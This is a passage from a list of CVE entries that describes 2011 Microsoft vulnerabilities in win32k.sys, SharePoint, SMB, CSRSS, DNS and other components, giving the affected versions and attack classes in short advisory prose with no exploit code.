(XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 